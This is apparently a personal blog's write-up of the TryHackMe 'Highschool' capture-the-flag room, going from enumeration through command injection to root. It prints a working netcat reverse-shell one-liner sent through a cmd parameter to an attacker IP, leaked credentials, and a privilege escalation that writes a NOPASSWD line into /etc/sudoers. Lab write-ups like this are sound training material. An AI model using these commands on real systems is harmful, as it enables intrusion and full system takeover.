~/ Home Projects Tools Link
Writeups
hackthebox/
  • 2million
  • Facts
  • Checkpoint
  • Enigma
  • Nimbus
  • Reactor
  • tryhackme/
  • Wonderland
  • Highschool
  • Ignite
  • JokerCTF
  • Lazy Admin
  • Lightroom
  • Lookup
  • Love Connect
  • Love note
  • Pyrat
  • Startup
  • Tryheartme
  • Valenfind
  • Valley
  • When hearts collide
  • THM Highschool


    nmap

    We first enumerate our ports and found only SSH & HTTP to be accessible.

    Gobuster

    Enumerated /assets/

    Source code PHP

    FUZZ php ID

    Returns base64.

    base64 -d [file] = dWlkPTMzKHd3dy1kYXRhKSBnaWQ9MzMod3d3LWRhdGEpIGdyb3Vwcz0zMyh3d3ctZGF0YSkK

    uid=33(www-data) gid=33(www-data) groups=33(www-data)

    HTML injection

    http://10.10.83.52/assets/index.php?cmd=
    This runs arbitrary bash CMD.

    Used vuln to upload reverse shell

    curl -s ‘http://10.10.83.52/assets/index.php’ -G –data-urlencode ‘cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.21.171.106 443 >/tmp/f’

    /var/www/Hidden_content

    We found passphrase.txt

    QWxsbWlnaHRGb3JFdmVyISEhCg==

    AllmightForEver!!!

    Checked /home/users/

    Found Deku user with user.txt can’t be readed.

    Got lost but found /assets/images forbidden

    There’s 2 jpgs in here with permission protection 1 corrupted.

    hexeditor changed format to jpg

    steghide to extract hidden data from jpg

    Found password for deku:

    One?For?All_!!one1/A

    ssh into machine using deku/One?For?All_!!one1/A

    cat user.txt

    Faffed about eventually found /opt/NewComponent/feedback.sh

    Feedback.sh lets you pass arbitrary bash commands

    RM all password with

    feedback.sh passes any arguments so, used sudo to pass this line that sets ALL to NOPASSWD and wrote it into sudoer file

    deku ALL=NOPASSWD: ALL >> /etc/sudoers

    NO MO’ PASSWD

    cd to def and read root.txt